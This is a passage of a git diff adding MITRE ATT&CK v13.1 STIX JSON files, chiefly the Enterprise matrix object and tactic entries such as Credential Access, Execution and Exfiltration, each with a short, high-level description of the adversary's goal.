"https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-matrix/x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-matrix/x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc.json new file mode 100644 index 0000000000000000000000000000000000000000..20f9d1100aa6812af2a8528f16b661a3a1f7ed80 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-matrix/x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--77873ccf-35c3-452f-9c10-1df65db11ac0", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592", + "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400", + "x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca", + "x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5", + "x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92", + "x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd", + "x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a", + "x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263", + "x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9", + "x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e", + "x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe", + "x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813", + "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", + "x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-matrix--eafc1b4c-5e56-4965-bd4e-66a6a89c88cc", + "type": "x-mitre-matrix", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "enterprise-attack", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/matrices/enterprise" + } + ], + "modified": "2022-04-01T20:43:55.937Z", + "name": "Enterprise ATT&CK", + "description": "Below are the tactics and technique representing the MITRE ATT&CK Matrix for Enterprise. The Matrix contains information for the following platforms: Windows, macOS, Linux, AWS, GCP, Azure, Azure AD, Office 365, SaaS.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263.json new file mode 100644 index 0000000000000000000000000000000000000000..6f2d9ceb5a4a9729482ce9844c7701be9a8f77bc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--2a3b4375-0dca-41ec-8442-674b3d5cf63f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0006", + "url": "https://attack.mitre.org/tactics/TA0006", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:43:41.967Z", + "name": "Credential Access", + "description": "The adversary is trying to steal account names and passwords.\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "credential-access" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5.json new file mode 100644 index 0000000000000000000000000000000000000000..edc07b64e41bdada778d6539f1161aa571ec71e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6183af15-0e62-4bb9-b5a9-7fb624719227", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0002", + "url": "https://attack.mitre.org/tactics/TA0002", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:42:06.909Z", + "name": "Execution", + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "execution" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8.json new file mode 100644 index 0000000000000000000000000000000000000000..c72cb6ca0f9a2e4a5b3570ed52d0b51cbaf11c4b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--18738568-e89a-44f8-988a-59625e11013a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8", + "type": "x-mitre-tactic", + "created": "2019-03-14T18:44:44.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0040", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0040" + } + ], + "modified": "2019-07-25T18:42:23.222Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n \nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries\u2019 goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "impact" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92.json new file mode 100644 index 0000000000000000000000000000000000000000..e28a1d6c4f1a2c17b2d351501dbfc2c9e2e6af85 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--028714d1-6071-455a-9b4b-2df53d132651", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0003", + "url": "https://attack.mitre.org/tactics/TA0003", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:42:33.899Z", + "name": "Persistence", + "description": "The adversary is trying to maintain their foothold.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "persistence" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd.json new file mode 100644 index 0000000000000000000000000000000000000000..918adb2ff32cd8f408ded7d4a497298fc2ad5e99 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--2904a825-3f86-4ce9-a002-04bac635ae31", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--5e29b093-294e-49e9-a803-dab3d73b77dd", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0004", + "url": "https://attack.mitre.org/tactics/TA0004", + "source_name": "mitre-attack" + } + ], + "modified": "2021-01-06T14:21:21.641Z", + "name": "Privilege Escalation", + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "privilege-escalation" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e.json new file mode 100644 index 0000000000000000000000000000000000000000..ede10de82ebcba4a011f6e3d949752620be15e06 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8bebb4ac-981e-436b-946c-8d72e0ad2ec3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7141578b-e50b-4dcc-bfa4-08a8dd689e9e", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0008", + "url": "https://attack.mitre.org/tactics/TA0008", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:44:36.953Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "lateral-movement" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a.json new file mode 100644 index 0000000000000000000000000000000000000000..91452d3f3729038899906cfe1ce0d66e24ada14b --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--968f956d-16c9-4fb0-9250-4fcc0b7e620c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0005", + "url": "https://attack.mitre.org/tactics/TA0005", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:43:23.473Z", + "name": "Defense Evasion", + "description": "The adversary is trying to avoid being detected.\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics\u2019 techniques are cross-listed here when those techniques include the added benefit of subverting defenses. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "defense-evasion" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462.json new file mode 100644 index 0000000000000000000000000000000000000000..dd5109486df7c63753a7ab9bd8a05189e38770d3 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--6f57265a-51c4-43f1-963c-308fe3692c19", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0010", + "url": "https://attack.mitre.org/tactics/TA0010", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:45:12.806Z", + "name": "Exfiltration", + "description": "The adversary is trying to steal data.\n\nExfiltration consists of techniques that adversaries may use to steal data from your network. Once they\u2019ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "exfiltration" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9.json new file mode 100644 index 0000000000000000000000000000000000000000..1d644ee90ff6cf59d3ca2ba9b7b71b8dd922f08a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4f290fd7-4d6e-41e1-b08a-13d7969782e4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--c17c5845-175e-4421-9713-829d0573dbc9", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0007", + "url": "https://attack.mitre.org/tactics/TA0007", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:44:13.228Z", + "name": "Discovery", + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what\u2019s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "discovery" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe.json new file mode 100644 index 0000000000000000000000000000000000000000..902ffd605010bcbe6b641cc9adea7e55fa657406 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9bbfc092-ab08-43a8-a961-63fd204a3d3f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d108ce10-2419-4cf9-a774-46161d6c6cfe", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0009", + "url": "https://attack.mitre.org/tactics/TA0009", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:44:53.176Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "collection" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400.json new file mode 100644 index 0000000000000000000000000000000000000000..cc144c73dde11670745abd37af48721b1c827805 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c1efb457-1bd5-4c78-87e8-774218d8c3ca", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400", + "type": "x-mitre-tactic", + "created": "2020-09-30T16:11:59.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0042", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0042" + } + ], + "modified": "2020-09-30T16:31:36.322Z", + "name": "Resource Development", + "description": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "resource-development" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592.json new file mode 100644 index 0000000000000000000000000000000000000000..ed9fa86af4a9109eccc97b26b1caf92085bcde04 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a52db7ce-379d-442e-9fe7-3a4d6375f8ee", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--daa4cbb1-b4f4-4723-a824-7f1efd6e0592", + "type": "x-mitre-tactic", + "created": "2020-10-02T14:48:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0043", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0043" + } + ], + "modified": "2020-10-18T02:04:50.842Z", + "name": "Reconnaissance", + "description": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "reconnaissance" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813.json new file mode 100644 index 0000000000000000000000000000000000000000..0a49613eee1f877e138317a6251a61720d3e410c --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--3faf1d15-885f-428e-8b95-405a68aedfce", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0011", + "url": "https://attack.mitre.org/tactics/TA0011", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:45:30.644Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with compromised systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim\u2019s network structure and defenses.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "command-and-control" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca.json new file mode 100644 index 0000000000000000000000000000000000000000..9681281fa0facfc4213a046aed5df35aff4ae738 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-tactic/x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--5e2ad04a-7acb-4769-853d-e4f2b2c78d8f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0001", + "url": "https://attack.mitre.org/tactics/TA0001", + "source_name": "mitre-attack" + } + ], + "modified": "2019-07-19T17:41:41.425Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.", + "x_mitre_version": 